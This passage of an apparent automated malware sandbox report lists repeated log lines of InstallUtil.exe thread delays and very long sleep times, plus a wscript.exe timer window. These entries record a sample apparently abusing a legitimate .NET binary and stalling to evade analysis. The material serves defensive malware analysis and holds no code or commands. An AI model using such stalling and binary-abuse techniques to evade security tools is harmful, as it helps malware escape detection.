                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595454
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595329
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595204
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595079
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594842
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594623
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594458
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594329
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594204
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594059
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 593890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 593781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 593671
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 593555
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599780
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599672
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599438
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599313
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599094
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598969
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595736
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595596
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595463
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595341
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594922
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594813
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594688
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594438
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 594094
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 593985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 593860
                      Source: C:\Windows\System32\wscript.exe - Window found: window name: WSH-Timer
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Window / User API: threadDelayed 2933
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Window / User API: threadDelayed 6873
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Window / User API: threadDelayed 1934
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Window / User API: threadDelayed 7885
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep count: 39 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -600000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6792 - Thread sleep count: 2933 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599844s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6792 - Thread sleep count: 6873 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599719s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep count: 33 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599594s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599485s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599360s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599235s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -599110s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598985s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598860s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598735s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598610s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598485s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598360s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768 - Thread sleep time: -598235s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596970s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596846s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594842s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594730s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594623s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594458s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594059s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593671s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593555s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940Thread sleep count: 1934 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940Thread sleep count: 7885 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599780s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595736s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595596s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595463s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595341s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595164s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595031s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -593985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -593860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596970Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596846Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
